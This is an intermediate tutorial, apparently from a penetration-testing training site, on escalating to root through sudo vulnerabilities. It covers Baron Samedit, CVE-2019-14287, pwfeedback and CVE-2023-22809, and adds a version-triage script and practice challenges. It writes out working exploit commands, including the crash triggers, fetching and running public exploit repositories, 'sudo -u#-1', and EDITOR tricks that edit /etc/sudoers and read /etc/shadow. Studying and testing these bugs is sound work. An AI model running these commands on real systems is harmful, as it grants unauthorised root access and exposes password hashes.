Sudo CVE Exploitation

Intermediate · 30 min · Writeup

Exploiting sudo vulnerabilities like CVE-2021-3156

Learning Objectives

  • Identify vulnerable sudo versions
  • Exploit Baron Samedit
  • Use other sudo CVEs
  • Understand patch levels

You've checked the usual paths, but there's another angle: sudo itself might be vulnerable. Several critical CVEs in sudo have led to instant root, regardless of what commands you're allowed to run.

Think of sudo CVEs as a flaw in the lock mechanism itself rather than an unlocked door. For some of them (Baron Samedit, the pwfeedback overflow) you don't even need a sudoers entry: any local user who can execute the setuid sudo binary can trigger the bug. Always check sudo --version.

Check Version First

Always run sudo --version early in enumeration. Vulnerable sudo versions are common on older systems and provide some of the easiest privilege escalation paths available. One caveat: distributions backport security fixes without bumping the upstream version number, so the version is a lead, not proof. Confirm with the per-CVE checks below before spending time on exploits.

Baron Samedit (CVE-2021-3156)

One of the most impactful sudo vulnerabilities to date. Baron Samedit is a heap-based buffer overflow that gives root on almost every sudo release shipped between 2011 and January 2021. No sudoers entry is required: any local user who can execute sudo (on most systems, everyone) can trigger it.

bash
# Affected versions
# legacy branch: sudo 1.8.2 through 1.8.31p2
# stable branch: sudo 1.9.0 through 1.9.5p1
# Fixed in: 1.9.5p2 (distro backports keep the old version number, so test rather than trust)

# Check sudo version
sudo --version
# Sudo version 1.8.21p2 ← in the affected range

# Quick vulnerability test (the check from the Qualys advisory; works as any user)
sudoedit -s /
# error starting with "sudoedit:" (e.g. "sudoedit: /: not a regular file") = vulnerable
# error starting with "usage: sudoedit ..."                                 = patched

# Trigger the overflow itself (noisy: crashes sudo and may be logged)
sudoedit -s '\' $(perl -e 'print "A" x 65536')
# malloc(): memory corruption / Segmentation fault = vulnerable
# usage: sudoedit ... = patched (sudoedit no longer accepts -s)

# === Exploit methods ===

# Method 1: searchsploit
searchsploit sudo 1.8
searchsploit -m 49521.py
python3 49521.py

# Method 2: blasty's exploit (built-in targets for specific distro/version pairs)
git clone https://github.com/blasty/CVE-2021-3156
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich
# Run without arguments to list the known targets, then rerun with the matching target number

# Method 3: worawit's PoCs
git clone https://github.com/worawit/CVE-2021-3156
cd CVE-2021-3156
python3 exploit_nss.py
# The repo ships several variants (exploit_nss.py is the most portable one);
# if one fails, try another - the heap layout differs between distros

Baron Samedit Technical Details

How Baron Samedit Works:
├── sudoedit is a symlink to sudo; sudo picks "shell mode" from -s/-i and "edit mode" from argv[0]
├── In shell mode parse_args() escapes metacharacters in each argument with a backslash,
│   and set_cmnd() later strips those backslashes while concatenating the arguments
│   into a heap buffer (user_args)
├── Bug: when invoked as sudoedit with -s, the escaping step is skipped but the
│   unescaping step in set_cmnd() still runs
├── A backslash at the very end of an argument makes set_cmnd() step past the
│   string's NUL terminator and keep copying from the following argv strings
├── The copy overruns the heap-allocated user_args buffer (heap overflow)
├── Attacker-controlled bytes overwrite adjacent heap objects; Qualys' public
│   technique overwrites glibc's NSS "service_user" struct so that the next name
│   lookup dlopen()s an attacker-supplied shared library as root
└── Result: code execution as root

The Vulnerability:
├── Input: sudoedit -s '\' <more arguments>
├── Bug: backslash handling in set_cmnd() (sudoers plugin) assumes parse_args() escaped the input
├── Effect: out-of-bounds read of argv and write past the end of user_args
└── Impact: heap corruption → code execution

Why It's So Bad:
├── No sudoers entry needed (just the ability to execute sudoedit)
├── Present for about 10 years (introduced July 2011, fixed January 2021)
├── Works on default configs
├── Multiple public exploitation techniques
└── Affects virtually all Linux distros (and other systems that ship sudo)

Distro-Specific Exploits

Baron Samedit exploits often need to match the target distribution and sudo version exactly. If one exploit fails, try others. The heap layout varies between distributions.

CVE-2019-14287 (sudo -u#-1)

This is a logic bug, not memory corruption. When a sudoers rule lets you run a command as any user except root, written (ALL, !root), a negative user ID slips past the exclusion. Elegant and simple.

bash
# Affected: sudo < 1.8.28
# Condition: a sudoers rule grants you a command as any user except root, i.e. (ALL, !root)

# Check sudo version
sudo --version
# Sudo version 1.8.21p2 ← vulnerable if the condition is met

# Check sudoers entry
sudo -l
# (ALL, !root) /bin/bash
# OR
# (ALL, !root) ALL

# The vulnerability:
# You ask for user ID -1 (or 4294967295, the same value read as an unsigned 32-bit int).
# No passwd entry has that uid, so the !root exclusion doesn't match and the
# runas check passes. sudo is already running as uid 0 (it is setuid root), and
# setresuid(-1, -1, -1) means "leave each id unchanged", so the command runs as root.

# Exploit
sudo -u#-1 /bin/bash
# id
# uid=0(root) ...

# Alternative
sudo -u#4294967295 /bin/bash
# Same result

# Side effect worth knowing: the sudo log records the requested uid (4294967295), not "root"

When CVE-2019-14287 Applies

bash
# You need BOTH conditions:
# 1. sudo < 1.8.28
# 2. a sudoers rule with the (ALL, !root) runas pattern

# Vulnerable sudoers examples:
user ALL=(ALL, !root) /bin/bash
user ALL=(ALL, !root) ALL
user ALL=(ALL, !root) /usr/bin/vim

# NOT vulnerable (there is no !root exclusion to bypass):
user ALL=(ALL) /bin/bash        # already allowed to run as root
user ALL=(root) /bin/bash       # only root is allowed, nothing excluded
user ALL=NOPASSWD: ALL          # runas defaults to root, already root

# Check carefully in sudo -l output:
sudo -l
# Look for: (ALL, !root) patterns
# The allowed command doesn't have to be a shell: vim or any editor as uid 0 is enough

Logic Bug = Reliable

Unlike memory corruption exploits, CVE-2019-14287 doesn't depend on memory layout, architecture or distro. If both conditions hold, a single command gives you a root shell; if they don't, sudo simply refuses with a permission error, so it costs nothing to try.

CVE-2019-18634 (pwfeedback)

A stack-based buffer overflow in the password prompt, reachable only when sudo is configured with pwfeedback (the option that echoes asterisks while you type a password). pwfeedback is off in upstream defaults, but some distributions (Linux Mint, elementary OS) enable it. Less common than the other bugs, but it needs no sudoers entry either.

bash
# Affected: sudo 1.7.1 through 1.8.30 with pwfeedback enabled (fixed in 1.8.31)
# Exploitable in practice only up to 1.8.25p1: 1.8.26-1.8.30 still contain the bug,
# but an EOF-handling change makes it unreachable (per the sudo advisory)

# Check if pwfeedback is enabled
sudo -l
# asterisks while typing the password = enabled
# sudo -l also lists it under "Matching Defaults entries" if it applies to you
sudo -l 2>/dev/null | grep pwfeedback

cat /etc/sudoers 2>/dev/null | grep pwfeedback
cat /etc/sudoers.d/* 2>/dev/null | grep pwfeedback
# Defaults pwfeedback ← vulnerable configuration

# Check version
sudo --version
# Needs to be < 1.8.31 (realistically <= 1.8.25p1)

# Exploitation
# The overflow is in tgetpass() while sudo reads the password with feedback.
# The attacker fully controls the overflowing bytes and needs no sudoers entry,
# but a working exploit still depends on the stack layout of the target binary.

# PoC:
git clone https://github.com/saleemrashid/sudo-cve-2019-18634
cd sudo-cve-2019-18634
make
./exploit
# Requires pwfeedback to be enabled

# Manual crash test from the sudo advisory: with stdin not a tty the erase/kill
# character is 0x00, and the line-erase path mishandles the remaining buffer length
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
# "Password: Segmentation fault" = vulnerable

CVE-2023-22809 (sudoedit Bypass)

A more recent sudoedit vulnerability. If you are allowed to sudoedit specific files, a crafted editor environment variable lets you edit arbitrary files as root.

bash
# Affected: sudo 1.8.0 through 1.9.12p1 (fixed in 1.9.12p2)

# Condition: user has a sudoedit (sudo -e) rule for at least one file

# Check for sudoedit permissions
sudo -l
# (root) NOPASSWD: sudoedit /etc/custom.conf
# OR
# (root) NOPASSWD: /usr/bin/sudoedit /etc/custom.conf

# sudoedit takes the editor from SUDO_EDITOR, VISUAL or EDITOR (in that order)
# and uses "--" to separate the editor's own arguments from the list of files to
# edit. A "--" inside the variable ends the editor arguments early, so whatever
# follows it is appended to the file list and handled like the allowed file:
# copied to a temp file, opened in the editor, and written back as root.

# Exploit
EDITOR='vim -- /etc/shadow' sudoedit /etc/custom.conf

# Or to get a shell: give yourself a sudoers rule
EDITOR='vim -- /etc/sudoers' sudoedit /etc/custom.conf
# Add: user ALL=(ALL) NOPASSWD: ALL
# Save and exit
sudo su

# Alternative with different editors / variables:
EDITOR='nano -- /etc/passwd' sudoedit /etc/custom.conf
SUDO_EDITOR='vim -- /etc/shadow' sudoedit /etc/custom.conf
# The fix in 1.9.12p2 rejects editor variables that contain "--"

Requires Existing sudoedit

CVE-2023-22809 requires you to already have sudoedit permissions to some file. It escalates limited sudoedit to editing any file, not direct root from nothing.

Older Sudo CVEs

bash
# === CVE-2017-1000367 (SELinux) ===
# Affects: sudo 1.8.6p7 through 1.8.20, built with SELinux support
# Requires: SELinux enabled and some sudoers rule for you (any command)
# Bug: get_process_ttyname() misparses /proc/[pid]/stat, so a crafted command
#      name can point sudo at an attacker-chosen "tty" that it opens as root
sudo --version
getenforce   # Check SELinux status
# Complex exploit, rarely seen in CTFs

# === CVE-2016-7076 ===
# Affects: sudo < 1.8.18p1
# Bug: noexec bypass, wordexp() could spawn a shell despite NOEXEC
# Requires: a NOEXEC: rule in sudoers, so rarely applicable

# === CVE-2015-5602 ===
# Affects: sudo < 1.8.15
# sudoedit symlink attack when the allowed path contains multiple wildcards
# (e.g. sudoedit /home/*/*/file.txt): the matched path can be a symlink to any file

# === General approach ===
# 1. Check sudo --version
# 2. Search: searchsploit sudo [version]
# 3. Search the web: "sudo [version] CVE"
# 4. Try applicable exploits (match the distro where the exploit depends on heap/stack layout)

Sudo Version Quick Reference

Sudo CVE Quick Reference:
┌──────────────────────────────┬──────────────────────────┬────────────────────────────┐
│ CVE                          │ Versions affected        │ Requirement                │
├──────────────────────────────┼──────────────────────────┼────────────────────────────┤
│ CVE-2021-3156 Baron Samedit  │ 1.8.2-1.8.31p2,          │ None (just run sudoedit)   │
│                              │ 1.9.0-1.9.5p1            │                            │
├──────────────────────────────┼──────────────────────────┼────────────────────────────┤
│ CVE-2019-14287 -u#-1 bypass  │ < 1.8.28                 │ (ALL, !root) rule          │
├──────────────────────────────┼──────────────────────────┼────────────────────────────┤
│ CVE-2019-18634 pwfeedback    │ 1.7.1-1.8.30             │ pwfeedback enabled;        │
│                              │ (exploitable <= 1.8.25p1)│ no sudoers entry needed    │
├──────────────────────────────┼──────────────────────────┼────────────────────────────┤
│ CVE-2023-22809 sudoedit      │ 1.8.0-1.9.12p1           │ a sudoedit rule            │
└──────────────────────────────┴──────────────────────────┴────────────────────────────┘

Version Parsing:
sudo --version
# Sudo version 1.8.21p2
#              │ │ │ └── patch level (p2); a version with no "p" sorts before p1
#              │ │ └──── release within the branch (21)
#              │ └────── branch: 1.8.x is the legacy branch, 1.9.x the stable one
#              └──────── major version (always 1 so far)
# Ordering: 1.8.31 < 1.8.31p2 < 1.9.0 < 1.9.5 < 1.9.5p1 < 1.9.5p2
# Distro package versions (e.g. 1.8.31-1ubuntu1.2) carry backported fixes the upstream number doesn't show

Sudo CVE Exploitation Flow

bash
# Step-by-step methodology

# 1. Get sudo version
sudo --version | head -1
# Sudo version 1.8.21p2

# 2. Check Baron Samedit (most impactful, needs no sudoers entry)
# Version 1.8.2-1.8.31p2 or 1.9.0-1.9.5p1?
sudoedit -s /
# error starts with "sudoedit:" → vulnerable, try the Baron Samedit exploits
# error starts with "usage:"    → patched (even if the version number looks old)

# 3. Check sudo -l output
sudo -l
# Look for (ALL, !root) patterns
# If found and sudo < 1.8.28 → CVE-2019-14287

# 4. Check pwfeedback
# Asterisks while typing the password, or pwfeedback among the Defaults that sudo -l prints?
# If yes and sudo <= 1.8.25p1 → CVE-2019-18634

# 5. Check sudoedit permissions
# A sudoedit rule in sudo -l?
# If yes and 1.8.0-1.9.12p1 → CVE-2023-22809

# 6. Search for other CVEs
searchsploit sudo 1.8.21
# Check results for applicable exploits
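The checks in this flow, written as one reusable script. This is an added example for this writeup, not code from the original page or from any of the exploit repositories mentioned above. It normalises the version string so patch levels compare correctly (the point of the quick-reference table), applies the four version ranges together with their sudoers preconditions to the text of sudo -l, and classifies the output of the sudoedit -s / probe. The sample sudo -l output, the user name alice and the host name target are constructed for the offline demo; the --live flag is this script's own and runs the same checks against the local sudo.

```bash
#!/bin/sh
# sudo CVE triage helper. Added example for this writeup, not code from the
# original page or from any of the exploit repositories above.
# The check functions are pure (version string + text of `sudo -l` in, lines
# out) so they can be exercised offline; `--live` runs them against local sudo.
# Version ranges are the ones in the table above. Distro backports keep the
# old version number, so a match is a lead, and Baron Samedit in particular
# must be confirmed with the `sudoedit -s /` probe.

# Normalise "1.8.21p2" (or the full "Sudo version 1.8.21p2" banner) into a
# sortable integer: major, minor, release, patch level -> 1 08 21 02 -> 1082102.
# A version without a p-suffix counts as p0, so 1.9.5 < 1.9.5p1 < 1.9.5p2.
sudo_version_key() {
    local ver base major rest minor release patch
    ver=${1#Sudo version }
    case "$ver" in
        *p*) base=${ver%p*}; patch=${ver##*p} ;;
        *)   base=$ver;      patch=0 ;;
    esac
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    release=${rest#*.}
    if [ "$release" = "$rest" ]; then release=0; fi   # "1.9" has no release part
    printf '%d%02d%02d%02d\n' "$major" "$minor" "$release" "$patch"
}

ver_lt() { [ "$(sudo_version_key "$1")" -lt "$(sudo_version_key "$2")" ]; }

# ver_in VERSION LOW HIGH: true if LOW <= VERSION <= HIGH
ver_in() {
    local k
    k=$(sudo_version_key "$1")
    [ "$k" -ge "$(sudo_version_key "$2")" ] && [ "$k" -le "$(sudo_version_key "$3")" ]
}

# Classify the first line of `sudoedit -s / 2>&1` (the advisory's quick test).
baron_samedit_probe() {
    case "$1" in
        sudoedit:*) echo "vulnerable: sudoedit accepted -s" ;;
        usage:*)    echo "patched: sudoedit rejected -s" ;;
        *)          echo "inconclusive: $1" ;;
    esac
}

# applicable_cves VERSION SUDO_L_TEXT: one line per CVE whose version range
# AND sudoers precondition both hold.
applicable_cves() {
    local v sudol
    v=$1; sudol=$2
    if ver_in "$v" 1.8.2 1.9.5p1; then
        echo "CVE-2021-3156 Baron Samedit: no sudoers entry needed; confirm with: sudoedit -s /"
    fi
    if ver_lt "$v" 1.8.28 && printf '%s\n' "$sudol" | grep -q '(ALL, *!root)'; then
        echo "CVE-2019-14287: (ALL, !root) rule present; try: sudo -u#-1 <allowed command>"
    fi
    # 1.8.26-1.8.30 contain the pwfeedback bug but are not exploitable, so stop at 1.8.25p1
    if ver_in "$v" 1.7.1 1.8.25p1 && printf '%s\n' "$sudol" | grep -q '[[:space:],]pwfeedback'; then
        echo "CVE-2019-18634: pwfeedback enabled; stack overflow in the password prompt"
    fi
    if ver_in "$v" 1.8.0 1.9.12p1 && printf '%s\n' "$sudol" | grep -q 'sudoedit'; then
        echo "CVE-2023-22809: sudoedit rule present; try: EDITOR='vim -- /etc/sudoers' sudoedit <allowed file>"
    fi
}

# Constructed `sudo -l` output for the offline demo (not from a real host).
SAMPLE_SUDO_L='Matching Defaults entries for alice on target:
    env_reset, pwfeedback, mail_badpass

User alice may run the following commands on target:
    (ALL, !root) /bin/bash
    (root) NOPASSWD: sudoedit /etc/custom.conf'

if [ "${1:-}" = "--live" ]; then
    applicable_cves "$(sudo --version | head -n 1)" "$(sudo -l 2>/dev/null || true)"
    baron_samedit_probe "$(sudoedit -s / 2>&1 | head -n 1)"
else
    echo "== sudo 1.8.21p2 with the sample sudo -l =="
    applicable_cves 1.8.21p2 "$SAMPLE_SUDO_L"
    echo "== sudo 1.9.15p5 with the same sudo -l =="
    applicable_cves 1.9.15p5 "$SAMPLE_SUDO_L"
fi
```

Run it with no arguments for the demo, or with --live on the target. Treat the output as a shortlist: a version inside a range can still carry a distro backport, which is why the Baron Samedit line tells you to confirm with sudoedit -s /, and why the sudoers-dependent entries only fire when the matching rule or Defaults entry actually appears in sudo -l.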

Sudo CVE Methodology

1. Version: run sudo --version to get the exact version
2. Baron Samedit: if 1.8.2-1.8.31p2 or 1.9.0-1.9.5p1, confirm with sudoedit -s / and try Baron Samedit first
3. sudo -l: check for (ALL, !root) patterns for -u#-1
4. pwfeedback: check whether asterisks show during password entry
5. sudoedit: check for sudoedit permissions
6. Searchsploit: search for version-specific exploits

Knowledge Check


What makes Baron Samedit (CVE-2021-3156) so dangerous?

Challenges

Exploit Baron Samedit

Challenge
💀 advanced

Given a system with sudo version 1.8.21p2, exploit Baron Samedit to gain root access.


Bypass !root Restriction

Challenge
🔥 intermediate

You have sudo -l showing: (ALL, !root) /bin/bash. Sudo version is 1.8.16. Get root.


Key Takeaways

  • Always check sudo --version early in enumeration, and remember that distros backport fixes without changing the version number
  • Baron Samedit (CVE-2021-3156): sudo 1.8.2-1.8.31p2 and 1.9.0-1.9.5p1, no sudoers entry needed
  • CVE-2019-14287: sudo < 1.8.28 + (ALL, !root) = sudo -u#-1 bypass
  • Test Baron Samedit with: sudoedit -s / (error starting "sudoedit:" = vulnerable, "usage:" = patched)
  • Different distros may need different exploit variants
  • Some sudo CVEs give root even with no sudo permissions at all